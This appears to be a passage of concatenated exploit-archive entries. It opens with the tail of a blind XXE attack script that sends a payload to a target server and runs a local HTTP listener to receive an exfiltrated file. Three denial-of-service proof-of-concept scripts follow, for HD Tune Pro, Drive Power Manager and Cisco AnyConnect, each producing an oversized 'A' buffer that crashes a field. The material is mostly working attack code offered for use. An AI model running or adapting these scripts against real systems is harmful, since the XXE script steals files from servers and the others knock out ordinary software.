''' + content

    print "Sending payload.."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    port = 80
    s.connect((target,port))
    s.send(payload)

def main(target):
    server = HTTPServer(SERVER_SOCKET, BlindXXEServer)
    thread = threading.Thread(target=server.serve_forever)
    thread.daemon = True
    thread.start()
    send_stage1(target)

    while not EXFILTRATED_EVENT.is_set():
        pass

if __name__ == '__main__':
    if len(sys.argv) > 1:
        target = sys.argv[1]
    if len(sys.argv) > 2:
        EXFIL_FILE = sys.argv[2]
    main(target)

# Exploit Title: HD Tune Pro 5.70 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-29
# Homepage: https://www.hdtune.com/
# Software Link: https://www.hdtune.com/download.html
# Tested Version: v5.70
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt". Copy the content of the new file "exploit.txt". 
# Now start the program, when inside the program click "File"> "Options.."> "Save". Now in the field named: "Folder / file name" paste the "exploit.txt" content copied eariler.
# Click "Apply"> "OK" and see a crash!  

#!/usr/bin/python

buffer = "A" * 6000

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

# Exploit Title: Drive Power Manager 1.10 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-29
# Homepage: https://www.hdtune.com/
# Software Link: https://www.hdtune.com/download.html
# Tested Version: v1.10
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt". Copy the content of the new file "exploit.txt". 
# Now start the program. Now in the field named: "Name" paste the "exploit.txt" content copied eariler.
# Click "Register" and see a crash!  

#!/usr/bin/python

buffer = "A" * 6000

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

# Exploit Title: Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-29
# Vendor Homepage: https://www.cisco.com/
# Software Link: App Store for iOS devices
# Tested Version: 4.6.01099
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1

# Steps to Produce the Crash:
# 1.- Run python code: Cisco_AnyConnect_Secure_Mobility_Client_4.6.01099.py
# 2.- Copy content to clipboard
# 3.- Open App Cisco AnyConnect Secure Mobility Client
# 4.- Diagnosticos
# 5.- Certificados
# 6.- Importar certificado de usuario...
# 7.- Paste ClipBoard on "Introducir URL"
# 8.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 12380000
print (buffer)